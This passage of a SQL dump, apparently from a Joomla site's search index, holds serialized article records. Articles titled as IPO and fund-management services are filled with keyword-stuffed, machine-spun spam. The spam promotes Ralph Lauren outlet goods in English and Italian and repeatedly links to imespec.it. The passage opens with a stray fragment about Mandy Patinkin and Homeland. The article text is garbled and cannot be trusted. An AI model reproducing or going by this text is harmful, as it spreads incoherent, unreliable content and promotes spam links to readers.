got up there.I noticed this year spending budget management nominations came out, i was struck with a sense of gratitude just extra this year, greater numbers of it.I\'m not sure if that\'s because the show is going into its seventh season.I just feel like these things are so fleeting and the concept you get to come back again is really touching, dan macmedan america todaymandy patinkin, on hand, arrives along with father, lester patinkin, at the 2013 emmy accolades. The \'homeland\' star says the set has turned into baby central and he can\'t wait for an arrival of\"Our young child\"Owing to co star morena baccarin. \"Claire danes since(The type of show\'s)First owner had babies.By the upcoming arrival of baby baccarin, the homeland set is in fact a locosounds daycare center, according to him. \"I am an experienced person at putting children to sleep.I rocked claire\'s baby to sleep when nobody else could, kevork djansezian, getty photographs.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(113,'index.php?option=com_content&view=article&id=126','index.php?option=com_content&view=article&id=126:initial-public-offering-solution-ipo-manager&catid=14:sample-data-articles&Itemid=691','Initial Public Offering Solution (IPO Manager)','Ralph lauren men s sandals business cleaning melbourne Some are cheap polo ralph lauren hoodies females very mens ralph lauren long sleeve polo logical, and some are ralph lauren polo dress shirts for men not all ralph lauren sweaters women that trivial.H','2015-06-01 05:23:59','f025c3604a7250b7f80a8e3e29b91173',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"126\";s:5:\"alias\";s:44:\"initial-public-offering-solution-ipo-manager\";s:7:\"summary\";s:6902:\"<p>Ralph lauren men s sandals business cleaning melbourne <br /><br />Some are cheap polo ralph lauren hoodies females very mens ralph lauren long sleeve polo logical, and some are ralph lauren polo dress shirts for men not all ralph lauren sweaters women that trivial.However the needs <b><a title=\"Ralph Lauren Italia\" href=\"http://www.imespec.it\">Ralph Lauren Italia</a></b> are tricky to get done, ralph lauren polo belts for cheap some serves as a a big pain for mens ralph lauren shorts a normal business indeed.But amid ralph lauren polos for men all this we are ralph lauren women s dresses going cheap polo ralph lauren dress shirts for men to polo ralph lauren shorts men look at some thing very polo ralph lauren belts cheap trivial, but immensely necessary for any wholesale polo ralph lauren jackets variety of business cheap polo ralph lauren striped shirts for men growth.I talking and in addition of the requirement involving cleaning.This comes mens ralph lauren polo shirts outlet for a natural and scientific effect of holding a non zero mens ralph lauren dress shirts online place of work.Polo ralph lauren mens outlet something that ralph lauren polo boys occupies cheap ralph lauren polo sport shirt for men space in nature, exists and for that reason ought to be cleaned, ralph lauren men s striped shirts and more so for all ralph lauren jackets for men things manufactured.Mens ralph lauren dress t tops <br /><br />Now that ralph lauren hoodies women him and i established regular cleaning is required for any household and polo ralph lauren womens sandals online also business, mens polo ralph lauren dress shirts let us look at the solutions for this usual ralph lauren polo womens chore.One of the time tested together ralph lauren sandals women with optimal solutions is of course the procurement of business cleaning services.These are expert services that would ralph lauren for women serve your household ralph lauren polo belts or business in the time bound fashion.The cheap ralph lauren shirts for women relationship is usually to be contractual in nature along with the services will be delivered through an ralph lauren sport shirt mens air of professionalism and reliability.Now we evaluate the various commercial cheap ralph lauren long sleeve polo for men cleaning providers out there.Flip polo ralph lauren mens striped <br /><br />One with the main categories ralph lauren polo shoes for men is business success is.Mens ralph lauren sandals under this theme, you can employ professional cleaners constantly to polo ralph lauren mens sport shirt come and sparkling your household.They polo ralph lauren scarves cheap come loaded their wholesale ralph lauren polo accessories own mens ralph lauren polo cheap inventory so you need not invest for ralph lauren polo shirts for girls outlet the reason mens ralph lauren polo classic fit outlet that.<br /><br />The ralph lauren shoes for men other broad cheap ralph lauren men s hoodies category is not polo ralph lauren mens sandals astoundingly for businesses.The growing businesses would ralph lauren sport shirt women definitely require professional ralph lauren women s sport shirt cleaners to address cheap ralph lauren polo scarves your regular cleaning chores.The contract would assist the cleaners to have ralph lauren hoodies mens purchasing cheap polo ralph lauren jackets for men tasks with various periodicities.<br /><br />Then ralph lauren women s sandals the cleaners can also be classified in term of the wholesale ralph lauren womens sweaters sort of service they furnish.As an example, look at the wholesale ralph lauren accessories carpet cleaners.Cheap ralph lauren polo hats these are the ralph lauren hoodies for men types of agencies that operate across residential or commercial cheap ralph lauren long sleeve shirts for men projects.They would womens polo ralph lauren ensure a thoroughly top quality cleanup to your polo ralph lauren womens hoodies online carpet with substances, cleaning, and thus.They would typically charge cheap ralph lauren women s sandals on the polo ralph lauren hats online section of the carpet cleaned.Polo ralph lauren hooded sweatshirts men <br /><br />Whether you clean women ralph lauren polo shirts wholesale your polo ralph lauren scarves store property ralph lauren polo for kids windows yourself or get in mens ralph lauren sport shirt expert to ralph lauren long sleeve shirts for men complete them, there from suppliers womens ralph lauren long sleeve polo are cheap polo ralph lauren long sleeve for women positive basic materials, tools and procedures ralph lauren polos for women that wholesale polo ralph lauren hats manage to work ralph lauren polo apparatus well.<br /><br />Masters ralph lauren polo handbags on sale cleansing shop and office windows, which polo ralph lauren womens sport shirt include large ralph lauren polo bags for cheap expanses cheap polo ralph lauren long sleeve for men amongst glass sheets, sometimes work with a different strategy to that used on smaller home windows.They connect water cleansers to the hoses, so that particles and minerals are taken off.This leaves no residue related to the glass like polo ralph lauren handbags ordinary faucet water.The use of soap and/or cleaning chemicals is polo ralph lauren mens hoodies outlet actually then preventable.Polo ralph lauren mens hoodies online fresh stains are ralph lauren sandals for men simplest to handle if you get practical quickly!Will come in handy too much old clean thick boys ralph lauren polo shirts bath ralph lauren men s hoodies towels, cheap polo ralph lauren shoes for men a womens ralph lauren shirts small bucket of fresh water that is clean, a particular ralph lauren polo hats sale bottle of vinegar, some sort of bottle of spray or sponge or cloth, and cheap polo ralph lauren girls something ralph lauren sweaters with regard to you may use as ralph lauren men s shorts a heavy body mens ralph lauren hoodies fat big books or wooden boards work okay.<br /><br />Fold a towel and input it throughout the stain;Check that polo ralph lauren bags cheap that it covers the over all stain, and the actual polo ralph lauren belts online weight into it.Ralph lauren polo mens allow the towel to soak polo ralph lauren mens hoodies up the urine polo ralph lauren custom made for men for concerning ten minutes.Ralph lauren striped shirts men then the actual towel and spray wholesale polo ralph lauren bags clean cheap ralph lauren polo sweaters for men water in the edge of the <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.imespec.it\">Ralph Lauren Polo Italia</a></b> blemish inwards until it perfectly ralph lauren striped shirts for men soaked.It cheap ralph lauren polo shirts for kids will comprehensive ralph lauren women dresses take in flip womens ralph lauren polo shirts regards to minute to soak completely.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-01 09:23:57\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:48:\"126:initial-public-offering-solution-ipo-manager\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:103:\"index.php/services/ipo-manager/14-sample-data-articles/126-initial-public-offering-solution-ipo-manager\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=126\";s:5:\"route\";s:134:\"index.php?option=com_content&view=article&id=126:initial-public-offering-solution-ipo-manager&catid=14:sample-data-articles&Itemid=691\";s:5:\"title\";s:46:\"Initial Public Offering Solution (IPO Manager)\";s:11:\"description\";s:6641:\"Ralph lauren men s sandals business cleaning melbourne Some are cheap polo ralph lauren hoodies females very mens ralph lauren long sleeve polo logical, and some are ralph lauren polo dress shirts for men not all ralph lauren sweaters women that trivial.However the needs Ralph Lauren Italia are tricky to get done, ralph lauren polo belts for cheap some serves as a a big pain for mens ralph lauren shorts a normal business indeed.But amid ralph lauren polos for men all this we are ralph lauren women s dresses going cheap polo ralph lauren dress shirts for men to polo ralph lauren shorts men look at some thing very polo ralph lauren belts cheap trivial, but immensely necessary for any wholesale polo ralph lauren jackets variety of business cheap polo ralph lauren striped shirts for men growth.I talking and in addition of the requirement involving cleaning.This comes mens ralph lauren polo shirts outlet for a natural and scientific effect of holding a non zero mens ralph lauren dress shirts online place of work.Polo ralph lauren mens outlet something that ralph lauren polo boys occupies cheap ralph lauren polo sport shirt for men space in nature, exists and for that reason ought to be cleaned, ralph lauren men s striped shirts and more so for all ralph lauren jackets for men things manufactured.Mens ralph lauren dress t tops Now that ralph lauren hoodies women him and i established regular cleaning is required for any household and polo ralph lauren womens sandals online also business, mens polo ralph lauren dress shirts let us look at the solutions for this usual ralph lauren polo womens chore.One of the time tested together ralph lauren sandals women with optimal solutions is of course the procurement of business cleaning services.These are expert services that would ralph lauren for women serve your household ralph lauren polo belts or business in the time bound fashion.The cheap ralph lauren shirts for womenrelationship is usually to be contractual in nature along with the services will be delivered through an ralph lauren sport shirt mens air of professionalism and reliability.Now we evaluate the various commercial cheap ralph lauren long sleeve polo for men cleaning providers out there.Flip polo ralph lauren mens striped One with the main categories ralph lauren polo shoes for men is business success is.Mens ralph lauren sandals under this theme, you can employ professional cleaners constantly to polo ralph lauren mens sport shirt come and sparkling your household.They polo ralph lauren scarves cheap come loaded their wholesale ralph lauren polo accessories own mens ralph lauren polo cheap inventory so you need not invest for ralph lauren polo shirts for girls outlet the reason mens ralph lauren polo classic fit outlet that. The ralph lauren shoes for men other broad cheap ralph lauren men s hoodies category is not polo ralph lauren mens sandals astoundingly for businesses.The growing businesses would ralph lauren sport shirt women definitely require professional ralph lauren women s sport shirt cleaners to address cheap ralph lauren polo scarves your regular cleaning chores.The contract would assist the cleaners to have ralph lauren hoodies mens purchasing cheap polo ralph lauren jackets for men tasks with various periodicities. Then ralph lauren women s sandals the cleaners can also be classified in term of the wholesale ralph lauren womens sweaters sort of service they furnish.As an example, look at the wholesale ralph lauren accessories carpet cleaners.Cheap ralph lauren polo hats these are the ralph lauren hoodies for men types of agencies that operate across residential or commercial cheap ralph lauren long sleeve shirts for men projects.They would womens polo ralph lauren ensure a thoroughly top quality cleanup to your polo ralph lauren womens hoodies online carpet with substances, cleaning, and thus.They would typically charge cheap ralph lauren women s sandals on thepolo ralph lauren hats online section of the carpet cleaned.Polo ralph lauren hooded sweatshirts men Whether you clean women ralph lauren polo shirts wholesale your polo ralph lauren scarves store property ralph lauren polo for kids windows yourself or get in mens ralph lauren sport shirt expert to ralph lauren long sleeve shirts for men complete them, there from suppliers womens ralph lauren long sleeve polo are cheap polo ralph lauren long sleeve for women positive basic materials, tools and procedures ralph lauren polos for women that wholesale polo ralph lauren hats manage to work ralph lauren polo apparatus well. Masters ralph lauren polo handbags on sale cleansing shop and office windows, which polo ralph lauren womens sport shirt include large ralph lauren polo bags for cheap expanses cheap polo ralph lauren long sleeve for men amongst glass sheets, sometimes work with a different strategy to that used on smaller home windows.They connect water cleansers to the hoses, so that particles and minerals are taken off.This leaves no residue related to the glass like polo ralph lauren handbags ordinary faucet water.The use of soap and/or cleaning chemicals is polo ralph lauren mens hoodies outlet actually then preventable.Polo ralph lauren mens hoodies online fresh stains are ralph lauren sandals for men simplest to handle if you get practical quickly!Will come in handy too much old clean thick boys ralph lauren polo shirts bath ralph lauren men s hoodies towels, cheap polo ralph lauren shoes for men a womens ralph lauren shirts small bucket of fresh water that is clean, a particular ralph lauren polo hats sale bottle of vinegar, some sort of bottle of spray or sponge or cloth, and cheap polo ralph lauren girls something ralph lauren sweaters with regard to you may use as ralph lauren men s shorts a heavy body mens ralph lauren hoodies fat big books or wooden boards work okay. Fold a towel and input it throughout the stain;Check that polo ralph lauren bags cheap that it coversthe over all stain, and the actual polo ralph lauren belts online weight into it.Ralph lauren polo mens allow the towel to soak polo ralph lauren mens hoodies up the urine polo ralph lauren custom made for men for concerning ten minutes.Ralph lauren striped shirts men then the actual towel and spray wholesale polo ralph lauren bags clean cheap ralph lauren polo sweaters for men water in the edge of the Ralph Lauren Polo Italia blemish inwards until it perfectly ralph lauren striped shirts for men soaked.It cheap ralph lauren polo shirts for kids will comprehensive ralph lauren women dresses take in flip womens ralph lauren polo shirts regards to minute to soak completely.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(114,'index.php?option=com_content&view=article&id=129','index.php?option=com_content&view=article&id=129:business-pages-3&catid=84:uae&Itemid=435','khartoom','Ralph lauren shirt a righe Ralph Lauren Outlet popular Ralph lauren canvas designer handbag è realizzato polo ralph lauren outlet in italia da tela di cotone, accentati minus morbida pelle vachetta Ralph Lauren Polo Italia e rifiniti disadvantage i nostri','2015-06-02 23:34:32','42472bc2326b7ff1d3a7d858520f1f13',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"129\";s:5:\"alias\";s:16:\"business-pages-3\";s:7:\"summary\";s:2264:\"<p>Ralph lauren shirt a righe <b><a title=\"Ralph Lauren Outlet\" href=\"http://www.imespec.it\">Ralph Lauren Outlet</a></b> popular <br /><br />Ralph lauren canvas designer handbag è realizzato polo ralph lauren outlet in italia da tela di cotone, accentati minus morbida pelle vachetta <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.imespec.it\">Ralph Lauren Polo Italia</a></b> e rifiniti disadvantage i nostri ricamati tre giocatori sovradimensionato polo su un lato nella vibrante filo multicolore.Robusto as a result of maniglia costruzione in un colore contrastante.<br /><br />Originali ralph lauren borse material includono i dettagli:I nostri accenti big horse ricamato sul davanti.Striscia bandiera pieced in rosa attraversa are generally parte anteriore.Interni tasca concerning cellulare e tasca applicata.Scomparto interno con nothing finiture in pelle morbida accentuato da cuciture di contrasto.Firma lauren in rilievo area logo in pelle.<br /><br />RalphLauren ha realizzato perLa prossima est una borsa pratica e capiente, il sogno di tutte the donne!IoAmo tantissimo the borse oversize, trovo gna il fatto gna possano contenere tutto ciò di cui ho bisogno(ELow! )Sia rassicurante e ormai tutti gli stilisti seguono questa tendenza cercando ralphLauren italia di realizzareAccessori non solo comodi maAncheAllure.Negli scaffali delle varie specialist troviamo borse per tutti i gusti:Di tela, plissettate, di cotone, di pelle, intricacciatica electronic stampatvitamin y!L.A.Scelta è vastissima.<br /><br />La borsa è not cassetto personale dove possiamo sistemare le nostre cose, gna siano necessarie o meno, è una perfetta alleata!Ma quella per il mare deve poter contenere non by yourself il necessario ma anche la stuoia, the creme solari, il pareo, le riviste e gli occhiali da on.<br /><br />Ma sony ericsson siete alla ricerca di una borsa pratica e stilosa, ron lauren ha quello che fa per voi!<br /><br />La beachfront bag è una borsa polo ralph lauren uomo in croquet semplice e raffinata, disadvantage doppio manico, chiusura a put proposta in turchese, n\'t bellissimo colore moda.L\'interno è rivestito con una fodera a sacca e tasche interne utilissime for every riporvi davvero di tutto in onefetto ordine.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-06-03 03:34:30\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:2:\"10\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"129:business-pages-3\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/129-business-pages-3\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=129\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=129:business-pages-3&catid=84:uae&Itemid=435\";s:5:\"title\";s:8:\"khartoom\";s:11:\"description\";s:2030:\"Ralph lauren shirt a righe Ralph Lauren Outlet popular Ralph lauren canvas designer handbag è realizzato polo ralph lauren outlet in italia da tela di cotone, accentati minus morbida pelle vachetta Ralph Lauren Polo Italia e rifiniti disadvantage i nostri ricamati tre giocatori sovradimensionato polo su un lato nella vibrante filo multicolore.Robusto as a result of maniglia costruzione in un colore contrastante. Originali ralph lauren borse material includono i dettagli:I nostri accenti big horse ricamato sul davanti.Striscia bandiera pieced in rosa attraversa are generally parte anteriore.Interni tasca concerning cellulare e tasca applicata.Scomparto interno con nothing finiture in pelle morbida accentuato da cuciture di contrasto.Firma lauren in rilievo area logo in pelle. RalphLauren ha realizzato perLa prossima est una borsa pratica e capiente, il sogno di tutte the donne!IoAmo tantissimo the borse oversize, trovo gna il fatto gna possano contenere tutto ciò di cui ho bisogno(ELow! )Sia rassicurante e ormai tutti gli stilisti seguono questa tendenza cercando ralphLauren italia di realizzareAccessori non solo comodi maAncheAllure.Negli scaffali delle varie specialist troviamo borse per tutti i gusti:Di tela, plissettate, di cotone, di pelle, intricacciatica electronic stampatvitamin y!L.A.Scelta è vastissima. La borsa è not cassetto personale dove possiamo sistemare le nostre cose, gna siano necessarie o meno, è una perfetta alleata!Ma quella per il mare deve poter contenere non by yourself il necessario ma anche la stuoia, the creme solari, il pareo, le riviste e gli occhiali da on. Ma sony ericsson siete alla ricerca di una borsa pratica e stilosa, ron lauren ha quello che fa per voi! La beachfront bag è una borsa polo ralph lauren uomo in croquet semplice e raffinata, disadvantage doppiomanico, chiusura a put proposta in turchese, n\'t bellissimo colore moda.L\'interno è rivestito con una fodera a sacca e tasche interne utilissime for every riporvi davvero di tutto in onefetto ordine.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(116,'index.php?option=com_content&view=article&id=125','index.php?option=com_content&view=article&id=125:fund-management-solutions&catid=14:sample-data-articles&Itemid=689','FUND Management Solutions','Discount wedding www.balfleet.com prom bridesmiad gowns 2013 Promotion Flower Girl Dresses Australia wedding prom bridesmaid dresses 2013 Supply top sale bridal dresses, wedding dresses 2013, bridesmaid robes, blossom girl dresses, mother of the bridal dr','2015-06-09 